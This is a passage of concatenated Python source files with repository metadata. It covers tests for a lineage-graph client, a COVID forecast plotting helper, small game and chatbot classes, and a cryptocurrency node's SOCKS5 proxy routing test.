Tests most of the node access methods """ # create rich versions aka node versions node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex lineage_graph = self.client.create_lineage_graph(source_key, source_key) # test created lineage_graph is valid self.assertTrue( lineage_graph is not None, msg="create_lineage_graph with source_key = {} returned None instead of a lineage_graph" .format(source_key) ) self.assertTrue( source_key == lineage_graph.get_source_key(), msg="lineage_graph created with source key {} has a differing source key: {}" .format(source_key, lineage_graph.get_source_key()) ) retrieved_lineage_graph = self.client.get_lineage_graph(source_key) # test retrieved lineage_graph_version is valid self.assertTrue( retrieved_lineage_graph is not None, msg='valid call to get_lineage_graph returned None' ) self.assertTrue( retrieved_lineage_graph == lineage_graph, msg='valid call to get_lineage_graph returned incorrect data' ) lineage_graph_version = self.client.create_lineage_graph_version( lineage_graph.get_id(), [] ) # test created lineage_graph_version is valid self.assertTrue( lineage_graph_version is not None, msg='create_lineage_graph_version with lineage_graph_id={} returned None instead of a lineage_graph version' .format(lineage_graph.get_id()) ) self.assertTrue( lineage_graph_version.get_lineage_graph_id() == lineage_graph.get_id(), msg="created lineage_graph_version's lineage_graph_id does not match id of lineage_graph" ) retrieved_nv = self.client.get_lineage_graph_version(lineage_graph_version.get_id()) # test retrieved lineage_graph_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_lineage_graph_version returned None' ) self.assertTrue( retrieved_nv == lineage_graph_version, msg='valid call to get_lineage_graph_version returned incorrect data' ) latest = self.client.get_lineage_graph_latest_versions(source_key) # test latest_version matches created lineage_graph_version self.assertTrue( latest == [lineage_graph_version.get_id()], msg="get_lineage_graph_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_lineage_graph_history(source_key) # expected_history = { # '0': [lineage_graph_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_lineage_graph_history did not match expected value" # ) if __name__ == '__main__': unittest.main()
38.502155
120
0.625917
import unittest import uuid import ground.client as client class TestClient(unittest.TestCase): @classmethod def setUpClass(cls): cls.client = client.GroundClient() def test_node(self): source_key = uuid.uuid4().hex node = self.client.create_node(source_key, source_key) self.assertTrue( node is not None, msg="create_node with source_key = {} returned None instead of a node" .format(source_key) ) self.assertTrue( source_key == node.get_source_key(), msg="node created with source key {} has a differing source key: {}" .format(source_key, node.get_source_key()) ) retrieved_node = self.client.get_node(source_key) self.assertTrue( retrieved_node is not None, msg='valid call to get_node returned None' ) self.assertTrue( retrieved_node == node, msg='valid call to get_node returned incorrect data' ) node_version = self.client.create_node_version(node.get_id()) self.assertTrue( node_version is not None, msg='create_node_version with node_id={} returned None instead of a node version' .format(node.get_id()) ) self.assertTrue( node_version.get_node_id() == node.get_id(), msg="created node_version's node_id does not match id of node" ) retrieved_nv = self.client.get_node_version(node_version.get_id()) # test retrieved node_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_node_version returned None' ) self.assertTrue( retrieved_nv == node_version, msg='valid call to get_node_version returned incorrect data' ) latest = self.client.get_node_latest_versions(source_key) # test latest_version matches created node_version self.assertTrue( latest == [node_version.get_id()], msg="get_node_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_node_history(source_key) # expected_history = { # '0': [node_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_node_history did not match expected value" # ) def test_graph(self): source_key = uuid.uuid4().hex graph = self.client.create_graph(source_key, source_key) # test created graph is valid self.assertTrue( graph is not None, msg="create_graph with source_key = {} returned None instead of a graph" .format(source_key) ) self.assertTrue( source_key == graph.get_source_key(), msg="graph created with source key {} has a differing source key: {}" .format(source_key, graph.get_source_key()) ) retrieved_graph = self.client.get_graph(source_key) # test retrieved graph_version is valid self.assertTrue( retrieved_graph is not None, msg='valid call to get_graph returned None' ) self.assertTrue( retrieved_graph == graph, msg='valid call to get_graph returned incorrect data' ) graph_version = self.client.create_graph_version(graph.get_id(), []) # test created graph_version is valid self.assertTrue( graph_version is not None, msg='create_graph_version with graph_id={} returned None instead of a graph version' .format(graph.get_id()) ) self.assertTrue( graph_version.get_graph_id() == graph.get_id(), msg="created graph_version's graph_id does not match id of graph" ) retrieved_gv = self.client.get_graph_version(graph_version.get_id()) self.assertTrue( retrieved_gv is not None, msg='valid call to get_graph_version returned None' ) self.assertTrue( retrieved_gv == graph_version, msg='valid call to get_graph_version returned incorrect data' ) latest = self.client.get_graph_latest_versions(source_key) self.assertTrue( latest == [graph_version.get_id()], msg="get_graph_latest_version returns incorrect versions" ) def test_edge(self): node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex edge = self.client.create_edge(source_key, source_key, node1.get_id(), node2.get_id()) self.assertTrue( edge is not None, msg="create_edge with source_key = {} returned None instead of a edge" .format(source_key) ) self.assertTrue( source_key == edge.get_source_key(), msg="edge created with source key {} has a differing source key: {}" .format(source_key, edge.get_source_key()) ) retrieved_edge = self.client.get_edge(source_key) self.assertTrue( retrieved_edge is not None, msg='valid call to get_edge returned None' ) self.assertTrue( retrieved_edge == edge, msg='valid call to get_edge returned incorrect data' ) edge_version = self.client.create_edge_version(edge.get_id(), nv1.get_id(), nv2.get_id()) self.assertTrue( edge_version is not None, msg='create_edge_version with edge_id={} returned None instead of a edge version' .format(edge.get_id()) ) self.assertTrue( edge_version.get_edge_id() == edge.get_id(), msg="created edge_version's edge_id does not match id of edge" ) retrieved_nv = self.client.get_edge_version(edge_version.get_id()) # test retrieved edge_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_edge_version returned None' ) self.assertTrue( retrieved_nv == edge_version, msg='valid call to get_edge_version returned incorrect data' ) latest = self.client.get_edge_latest_versions(source_key) # test latest_version matches created edge_version self.assertTrue( latest == [edge_version.get_id()], msg="get_edge_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_edge_history(source_key) # expected_history = { # '0': [edge_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_edge_history did not match expected value" # ) def test_structure(self): source_key = uuid.uuid4().hex structure = self.client.create_structure(source_key, source_key) # test created structure is valid self.assertTrue( structure is not None, msg="create_structure with source_key = {} returned None instead of a structure" .format(source_key) ) self.assertTrue( source_key == structure.get_source_key(), msg="structure created with source key {} has a differing source key: {}" .format(source_key, structure.get_source_key()) ) retrieved_structure = self.client.get_structure(source_key) # test retrieved structure_version is valid self.assertTrue( retrieved_structure is not None, msg='valid call to get_structure returned None' ) self.assertTrue( retrieved_structure == structure, msg='valid call to get_structure returned incorrect data' ) structure_version = self.client.create_structure_version(structure.get_id(), {}) # test created structure_version is valid self.assertTrue( structure_version is not None, msg='create_structure_version with structure_id={} returned None instead of a structure version' .format(structure.get_id()) ) self.assertTrue( structure_version.get_structure_id() == structure.get_id(), msg="created structure_version's structure_id does not match id of structure" ) retrieved_nv = self.client.get_structure_version(structure_version.get_id()) self.assertTrue( retrieved_nv is not None, msg='valid call to get_structure_version returned None' ) self.assertTrue( retrieved_nv == structure_version, msg='valid call to get_structure_version returned incorrect data' ) latest = self.client.get_structure_latest_versions(source_key) self.assertTrue( latest == [structure_version.get_id()], msg="get_structure_latest_version returns incorrect versions" ) def test_lineage_edge(self): node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex lineage_edge = self.client.create_lineage_edge(source_key, source_key) self.assertTrue( lineage_edge is not None, msg="create_lineage_edge with source_key = {} returned None instead of a lineage_edge" .format(source_key) ) self.assertTrue( source_key == lineage_edge.get_source_key(), msg="lineage_edge created with source key {} has a differing source key: {}" .format(source_key, lineage_edge.get_source_key()) ) retrieved_lineage_edge = self.client.get_lineage_edge(source_key) self.assertTrue( retrieved_lineage_edge is not None, msg='valid call to get_lineage_edge returned None' ) self.assertTrue( retrieved_lineage_edge == lineage_edge, msg='valid call to get_lineage_edge returned incorrect data' ) lineage_edge_version = self.client.create_lineage_edge_version( lineage_edge.get_id(), nv1.get_id(), nv2.get_id() ) self.assertTrue( lineage_edge_version is not None, msg='create_lineage_edge_version with lineage_edge_id={} returned None instead of a lineage_edge version' .format(lineage_edge.get_id()) ) self.assertTrue( lineage_edge_version.get_lineage_edge_id() == lineage_edge.get_id(), msg="created lineage_edge_version's lineage_edge_id does not match id of lineage_edge" ) retrieved_nv = self.client.get_lineage_edge_version(lineage_edge_version.get_id()) # test retrieved lineage_edge_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_lineage_edge_version returned None' ) self.assertTrue( retrieved_nv == lineage_edge_version, msg='valid call to get_lineage_edge_version returned incorrect data' ) latest = self.client.get_lineage_edge_latest_versions(source_key) # test latest_version matches created lineage_edge_version self.assertTrue( latest == [lineage_edge_version.get_id()], msg="get_lineage_edge_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_lineage_edge_history(source_key) # expected_history = { # '0': [lineage_edge_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_lineage_edge_history did not match expected value" # ) def test_lineage_graph(self): # create rich versions aka node versions node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex lineage_graph = self.client.create_lineage_graph(source_key, source_key) # test created lineage_graph is valid self.assertTrue( lineage_graph is not None, msg="create_lineage_graph with source_key = {} returned None instead of a lineage_graph" .format(source_key) ) self.assertTrue( source_key == lineage_graph.get_source_key(), msg="lineage_graph created with source key {} has a differing source key: {}" .format(source_key, lineage_graph.get_source_key()) ) retrieved_lineage_graph = self.client.get_lineage_graph(source_key) # test retrieved lineage_graph_version is valid self.assertTrue( retrieved_lineage_graph is not None, msg='valid call to get_lineage_graph returned None' ) self.assertTrue( retrieved_lineage_graph == lineage_graph, msg='valid call to get_lineage_graph returned incorrect data' ) lineage_graph_version = self.client.create_lineage_graph_version( lineage_graph.get_id(), [] ) # test created lineage_graph_version is valid self.assertTrue( lineage_graph_version is not None, msg='create_lineage_graph_version with lineage_graph_id={} returned None instead of a lineage_graph version' .format(lineage_graph.get_id()) ) self.assertTrue( lineage_graph_version.get_lineage_graph_id() == lineage_graph.get_id(), msg="created lineage_graph_version's lineage_graph_id does not match id of lineage_graph" ) retrieved_nv = self.client.get_lineage_graph_version(lineage_graph_version.get_id()) self.assertTrue( retrieved_nv is not None, msg='valid call to get_lineage_graph_version returned None' ) self.assertTrue( retrieved_nv == lineage_graph_version, msg='valid call to get_lineage_graph_version returned incorrect data' ) latest = self.client.get_lineage_graph_latest_versions(source_key) self.assertTrue( latest == [lineage_graph_version.get_id()], msg="get_lineage_graph_latest_version returns incorrect versions" ) if __name__ == '__main__': unittest.main()
true
true
f7290541ba6a219c1b23507983095ee257129671
232
py
Python
dbl_archive_data_storage/frugal_storer/frugal_collection.py
ubsicap/dbl-archive-data-storage
03786ed54024a55ae96b93948a656a3c01269894
[ "MIT" ]
null
null
null
dbl_archive_data_storage/frugal_storer/frugal_collection.py
ubsicap/dbl-archive-data-storage
03786ed54024a55ae96b93948a656a3c01269894
[ "MIT" ]
12
2018-12-11T17:49:01.000Z
2019-02-21T18:26:22.000Z
dbl_archive_data_storage/frugal_storer/frugal_collection.py
ubsicap/dbl-archive-data-storage
03786ed54024a55ae96b93948a656a3c01269894
[ "MIT" ]
null
null
null
class FrugalCollection: id = None snapshots = None def __init__(self, collection_id): snapshots = {} self.id = collection_id def __str__(self): return "<Collection {0}>".format(self.id)
21.090909
49
0.599138
class FrugalCollection: id = None snapshots = None def __init__(self, collection_id): snapshots = {} self.id = collection_id def __str__(self): return "<Collection {0}>".format(self.id)
true
true
f7290550adfa216a398f7dd493901439630b261f
5,006
py
Python
functions/plot_utils.py
biomac-lab/covid19_forecast
6613064f8a6d8023ecbdaddbc2e7525b6ad0796f
[ "Apache-2.0" ]
null
null
null
functions/plot_utils.py
biomac-lab/covid19_forecast
6613064f8a6d8023ecbdaddbc2e7525b6ad0796f
[ "Apache-2.0" ]
null
null
null
functions/plot_utils.py
biomac-lab/covid19_forecast
6613064f8a6d8023ecbdaddbc2e7525b6ad0796f
[ "Apache-2.0" ]
null
null
null
from matplotlib.dates import date2num, num2date from matplotlib.colors import ListedColormap from matplotlib import dates as mdates from matplotlib.patches import Patch from matplotlib import pyplot as plt from matplotlib import ticker import os def plot_fit(df_fit, df_data, y_label='Deaths', y_lim_up = 200, color='blue', col_data='smoothed_death', col_up='high_95', col_down='low_95', col_point='median', ax=None, sharey=True, forecast=True, path_to_save=None): """ df_fit with columns: 'mean', 'median', 'std', 'low_95', 'high_95', 'low_80', 'high_80', 'low_50', 'high_50', 'type' type in ['estimate', 'forecast'] df_data with columns: 'confirmed', 'death', 'smoothed_confirmed', 'smoothed_death', 'type' type in ['fitted', 'preliminary'] """ df_estimate = df_fit.copy(); df_estimate = df_estimate[ df_estimate.type=='estimate' ] df_forecast = df_fit.copy(); df_forecast = df_forecast[ df_forecast.type=='forecast' ] df_data_fitted = df_data.copy(); df_data_fitted = df_data_fitted[df_data_fitted.type=='fitted'] df_data_preliminary = df_data.copy(); df_data_preliminary = df_data_preliminary[df_data_preliminary.type=='preliminary'] fig, axes = plt.subplots(1, 2, figsize=(20, 7), sharey=sharey) axes[0].fill_between(df_estimate.index.values, df_estimate[col_down], df_estimate[col_up], color='gray', alpha=0.4, label='95 CI - Nowcast') axes[0].plot(df_estimate.index.values, df_estimate[col_point], color='black', alpha=0.4, label='Median - Nowcast') axes[0].scatter(df_data_fitted.index.values, df_data_fitted[col_data], facecolor='black', alpha=0.6, edgecolor='black', s=30) (y1_l, y2_l) = axes[0].get_ylim() axes[0].fill_between(df_forecast.index.values, df_forecast[col_down], df_forecast[col_up], color=color, alpha=0.6, label='95% CI') axes[0].fill_between(df_forecast.index.values, df_forecast['low_80'], df_forecast['high_80'], color=color, alpha=0.4, label='80% CI') axes[0].fill_between(df_forecast.index.values, df_forecast['low_50'], df_forecast['high_50'], color=color, alpha=0.4, label='50% CI') axes[0].plot(df_forecast.index.values, df_forecast[col_point], color=color, alpha=0.4, label='Forecast - Median') axes[0].scatter(df_forecast.index.values, df_forecast[col_point], edgecolor='k', facecolor='white', s=10) axes[0].tick_params(axis='both', labelsize=15) axes[1].fill_between(df_estimate.iloc[-10:].index.values, df_estimate.iloc[-10:][col_up], df_estimate.iloc[-10:][col_down], color='gray', alpha=0.4) axes[1].plot(df_estimate.iloc[-10:].index.values, df_estimate.iloc[-10:][col_point], color='black', alpha=0.4) axes[1].fill_between(df_forecast.index.values, df_forecast[col_down], df_forecast[col_up], color=color, alpha=0.2, label='90% CI') axes[1].fill_between(df_forecast.index.values, df_forecast['low_80'], df_forecast['high_80'], color=color, alpha=0.4, label='80% CI') axes[1].fill_between(df_forecast.index.values, df_forecast['low_50'], df_forecast['high_50'], color=color, alpha=0.6, label='50% CI') axes[1].plot(df_forecast.index.values, df_forecast[col_point], color='black', alpha=0.4) axes[1].scatter(df_estimate.iloc[-10:].index.values, df_data_fitted.iloc[-10:][col_data], facecolor='black', alpha=0.6, edgecolor='black', s=50) axes[1].scatter(df_data_preliminary.index.values, df_data_preliminary[col_data], edgecolor='k', facecolor='red', s=50, label='Preliminary data') for ax in axes: ax.xaxis.set_major_locator(mdates.MonthLocator()) ax.xaxis.set_major_formatter(mdates.DateFormatter('%b')) ax.xaxis.set_minor_locator(mdates.DayLocator()) ax.xaxis.set_major_locator(mdates.WeekdayLocator()) ax.xaxis.set_major_locator(mdates.MonthLocator()) ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['left'].set_visible(False) ax.spines['bottom'].set_visible(False) ax.grid(which='major', axis='y', c='k', alpha=.1, zorder=-2) ax.yaxis.set_major_formatter(ticker.StrMethodFormatter("{x:.0f}")) ax.set_ylabel(y_label, size=15) ax.set_ylim( (y1_l, y_lim_up) ) ax.legend(loc='upper left') axes[1].xaxis.set_major_locator(mdates.MonthLocator()) axes[1].xaxis.set_major_formatter(mdates.DateFormatter('%d-%b')) axes[1].xaxis.set_minor_locator(mdates.DayLocator()) axes[1].xaxis.set_minor_formatter(mdates.DateFormatter('%d')) axes[1].xaxis.set_major_locator(mdates.WeekdayLocator()) axes[1].xaxis.set_major_locator(mdates.MonthLocator()) axes[1].tick_params(which='both', axis='both', labelrotation=90, labelsize=15) axes[1].grid(which='both', axis='x', c='k', alpha=.1, zorder=-2) axes[0].grid(which='major', axis='x', c='k', alpha=.1, zorder=-2) plt.tight_layout() if path_to_save: fig.savefig(path_to_save, dpi=300, bbox_inches='tight', transparent=False) plt.close()
60.313253
220
0.702157
from matplotlib.dates import date2num, num2date from matplotlib.colors import ListedColormap from matplotlib import dates as mdates from matplotlib.patches import Patch from matplotlib import pyplot as plt from matplotlib import ticker import os def plot_fit(df_fit, df_data, y_label='Deaths', y_lim_up = 200, color='blue', col_data='smoothed_death', col_up='high_95', col_down='low_95', col_point='median', ax=None, sharey=True, forecast=True, path_to_save=None): df_estimate = df_fit.copy(); df_estimate = df_estimate[ df_estimate.type=='estimate' ] df_forecast = df_fit.copy(); df_forecast = df_forecast[ df_forecast.type=='forecast' ] df_data_fitted = df_data.copy(); df_data_fitted = df_data_fitted[df_data_fitted.type=='fitted'] df_data_preliminary = df_data.copy(); df_data_preliminary = df_data_preliminary[df_data_preliminary.type=='preliminary'] fig, axes = plt.subplots(1, 2, figsize=(20, 7), sharey=sharey) axes[0].fill_between(df_estimate.index.values, df_estimate[col_down], df_estimate[col_up], color='gray', alpha=0.4, label='95 CI - Nowcast') axes[0].plot(df_estimate.index.values, df_estimate[col_point], color='black', alpha=0.4, label='Median - Nowcast') axes[0].scatter(df_data_fitted.index.values, df_data_fitted[col_data], facecolor='black', alpha=0.6, edgecolor='black', s=30) (y1_l, y2_l) = axes[0].get_ylim() axes[0].fill_between(df_forecast.index.values, df_forecast[col_down], df_forecast[col_up], color=color, alpha=0.6, label='95% CI') axes[0].fill_between(df_forecast.index.values, df_forecast['low_80'], df_forecast['high_80'], color=color, alpha=0.4, label='80% CI') axes[0].fill_between(df_forecast.index.values, df_forecast['low_50'], df_forecast['high_50'], color=color, alpha=0.4, label='50% CI') axes[0].plot(df_forecast.index.values, df_forecast[col_point], color=color, alpha=0.4, label='Forecast - Median') axes[0].scatter(df_forecast.index.values, df_forecast[col_point], edgecolor='k', facecolor='white', s=10) axes[0].tick_params(axis='both', labelsize=15) axes[1].fill_between(df_estimate.iloc[-10:].index.values, df_estimate.iloc[-10:][col_up], df_estimate.iloc[-10:][col_down], color='gray', alpha=0.4) axes[1].plot(df_estimate.iloc[-10:].index.values, df_estimate.iloc[-10:][col_point], color='black', alpha=0.4) axes[1].fill_between(df_forecast.index.values, df_forecast[col_down], df_forecast[col_up], color=color, alpha=0.2, label='90% CI') axes[1].fill_between(df_forecast.index.values, df_forecast['low_80'], df_forecast['high_80'], color=color, alpha=0.4, label='80% CI') axes[1].fill_between(df_forecast.index.values, df_forecast['low_50'], df_forecast['high_50'], color=color, alpha=0.6, label='50% CI') axes[1].plot(df_forecast.index.values, df_forecast[col_point], color='black', alpha=0.4) axes[1].scatter(df_estimate.iloc[-10:].index.values, df_data_fitted.iloc[-10:][col_data], facecolor='black', alpha=0.6, edgecolor='black', s=50) axes[1].scatter(df_data_preliminary.index.values, df_data_preliminary[col_data], edgecolor='k', facecolor='red', s=50, label='Preliminary data') for ax in axes: ax.xaxis.set_major_locator(mdates.MonthLocator()) ax.xaxis.set_major_formatter(mdates.DateFormatter('%b')) ax.xaxis.set_minor_locator(mdates.DayLocator()) ax.xaxis.set_major_locator(mdates.WeekdayLocator()) ax.xaxis.set_major_locator(mdates.MonthLocator()) ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['left'].set_visible(False) ax.spines['bottom'].set_visible(False) ax.grid(which='major', axis='y', c='k', alpha=.1, zorder=-2) ax.yaxis.set_major_formatter(ticker.StrMethodFormatter("{x:.0f}")) ax.set_ylabel(y_label, size=15) ax.set_ylim( (y1_l, y_lim_up) ) ax.legend(loc='upper left') axes[1].xaxis.set_major_locator(mdates.MonthLocator()) axes[1].xaxis.set_major_formatter(mdates.DateFormatter('%d-%b')) axes[1].xaxis.set_minor_locator(mdates.DayLocator()) axes[1].xaxis.set_minor_formatter(mdates.DateFormatter('%d')) axes[1].xaxis.set_major_locator(mdates.WeekdayLocator()) axes[1].xaxis.set_major_locator(mdates.MonthLocator()) axes[1].tick_params(which='both', axis='both', labelrotation=90, labelsize=15) axes[1].grid(which='both', axis='x', c='k', alpha=.1, zorder=-2) axes[0].grid(which='major', axis='x', c='k', alpha=.1, zorder=-2) plt.tight_layout() if path_to_save: fig.savefig(path_to_save, dpi=300, bbox_inches='tight', transparent=False) plt.close()
true
true
f72906cf1c0c23a067d469ea51e3f75a7351ddf8
602
py
Python
arctia/tasks/take.py
unternehmen/arctia
5c0a9b1933199c09dc7312730ed32c3894bc33ac
[ "Unlicense" ]
1
2018-01-12T15:11:03.000Z
2018-01-12T15:11:03.000Z
arctia/tasks/take.py
unternehmen/arctia
5c0a9b1933199c09dc7312730ed32c3894bc33ac
[ "Unlicense" ]
4
2018-02-17T00:20:09.000Z
2018-06-01T19:49:08.000Z
arctia/tasks/take.py
unternehmen/arctia
5c0a9b1933199c09dc7312730ed32c3894bc33ac
[ "Unlicense" ]
null
null
null
class Take(object): def __init__(self, stage, unit, entity, not_found_proc, finished_proc): self._stage = stage self._unit = unit self._entity = entity self._finished_proc = finished_proc self._not_found_proc = not_found_proc def enact(self): if not self._entity.location \ or self._entity.location != (self._unit.x, self._unit.y): self._not_found_proc() return self._entity.location = None self._stage.delete_entity(self._entity) self._finished_proc() return
30.1
68
0.604651
class Take(object): def __init__(self, stage, unit, entity, not_found_proc, finished_proc): self._stage = stage self._unit = unit self._entity = entity self._finished_proc = finished_proc self._not_found_proc = not_found_proc def enact(self): if not self._entity.location \ or self._entity.location != (self._unit.x, self._unit.y): self._not_found_proc() return self._entity.location = None self._stage.delete_entity(self._entity) self._finished_proc() return
true
true
f7290817b1b55a787a87349b4e16e983876e4dc9
603
py
Python
chatbotmaker/tests/messenger_test.py
Dominique57/ChatBotMaker
4d3d27f2a4f4a221eddac63316ddd7b56ab4b5e5
[ "MIT" ]
null
null
null
chatbotmaker/tests/messenger_test.py
Dominique57/ChatBotMaker
4d3d27f2a4f4a221eddac63316ddd7b56ab4b5e5
[ "MIT" ]
null
null
null
chatbotmaker/tests/messenger_test.py
Dominique57/ChatBotMaker
4d3d27f2a4f4a221eddac63316ddd7b56ab4b5e5
[ "MIT" ]
null
null
null
from ..messenger import Messenger from . import pytest def test_send_message_should_fail(): messenger = Messenger() with pytest.raises(Exception) as exception_info: messenger.send("user", "message") assert "implemented" in str(exception_info) def test_mark_writing_on_should_do_nothing(): messenger = Messenger() messenger.mark_writing("user", True) def test_mark_writing_off_should_do_nothing(): messenger = Messenger() messenger.mark_writing("user", False) def test_mark_seen_should_do_nothing(): messenger = Messenger() messenger.mark_seen("user")
24.12
52
0.742952
from ..messenger import Messenger from . import pytest def test_send_message_should_fail(): messenger = Messenger() with pytest.raises(Exception) as exception_info: messenger.send("user", "message") assert "implemented" in str(exception_info) def test_mark_writing_on_should_do_nothing(): messenger = Messenger() messenger.mark_writing("user", True) def test_mark_writing_off_should_do_nothing(): messenger = Messenger() messenger.mark_writing("user", False) def test_mark_seen_should_do_nothing(): messenger = Messenger() messenger.mark_seen("user")
true
true
f729085e094974666a7d52a1effd0459218151e6
6,100
py
Python
qa/rpc-tests/proxy_test.py
listedlinked/newsvn
2a53c7054fc37dfdab3ecac8e159f9d98823b2b5
[ "MIT" ]
null
null
null
qa/rpc-tests/proxy_test.py
listedlinked/newsvn
2a53c7054fc37dfdab3ecac8e159f9d98823b2b5
[ "MIT" ]
null
null
null
qa/rpc-tests/proxy_test.py
listedlinked/newsvn
2a53c7054fc37dfdab3ecac8e159f9d98823b2b5
[ "MIT" ]
null
null
null
#!/usr/bin/env python2 # Copyright (c) 2015 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. import socket import traceback, sys from binascii import hexlify import time, os from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType from test_framework import BitcoinTestFramework from util import * ''' Test plan: - Start bitcoind's with different proxy configurations - Use addnode to initiate connections - Verify that proxies are connected to, and the right connection command is given - Proxy configurations to test on bitcoind side: - `-proxy` (proxy everything) - `-onion` (proxy just onions) - `-proxyrandomize` Circuit randomization - Proxy configurations to test on proxy side, - support no authentication (other proxy) - support no authentication + user/pass authentication (Tor) - proxy on IPv6 - Create various proxies (as threads) - Create bitcoinds that connect to them - Manipulate the bitcoinds using addnode (onetry) an observe effects addnode connect to IPv4 addnode connect to IPv6 addnode connect to onion addnode connect to generic DNS name ''' class ProxyTest(BitcoinTestFramework): def __init__(self): # Create two proxies on different ports # ... one unauthenticated self.conf1 = Socks5Configuration() self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000)) self.conf1.unauth = True self.conf1.auth = False # ... one supporting authenticated and unauthenticated (Tor) self.conf2 = Socks5Configuration() self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000)) self.conf2.unauth = True self.conf2.auth = True # ... one on IPv6 with similar configuration self.conf3 = Socks5Configuration() self.conf3.af = socket.AF_INET6 self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000)) self.conf3.unauth = True self.conf3.auth = True self.serv1 = Socks5Server(self.conf1) self.serv1.start() self.serv2 = Socks5Server(self.conf2) self.serv2.start() self.serv3 = Socks5Server(self.conf3) self.serv3.start() def setup_nodes(self): # Note: proxies are not used to connect to local nodes # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost return start_nodes(4, self.options.tmpdir, extra_args=[ ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0'] ]) def node_test(self, node, proxies, auth): rv = [] # Test: outgoing IPv4 connection through node node.addnode("15.61.23.23:1234", "onetry") cmd = proxies[0].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "15.61.23.23") assert_equal(cmd.port, 1234) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing IPv6 connection through node node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry") cmd = proxies[1].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534") assert_equal(cmd.port, 5443) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing onion connection through node node.addnode("newsvnvj7kcklujarx.onion:50020", "onetry") cmd = proxies[2].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "newsvnvj7kcklujarx.onion") assert_equal(cmd.port, 50020) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing DNS name connection through node node.addnode("node.noumenon:8333", "onetry") cmd = proxies[3].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "node.noumenon") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) return rv def run_test(self): # basic -proxy self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False) # -proxy plus -onion self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False) # -proxy plus -onion, -proxyrandomize rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True) # Check that credentials as used for -proxyrandomize connections are unique credentials = set((x.username,x.password) for x in rv) assert_equal(len(credentials), 4) # proxy on IPv6 localhost self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False) if __name__ == '__main__': ProxyTest().main()
41.780822
145
0.653115
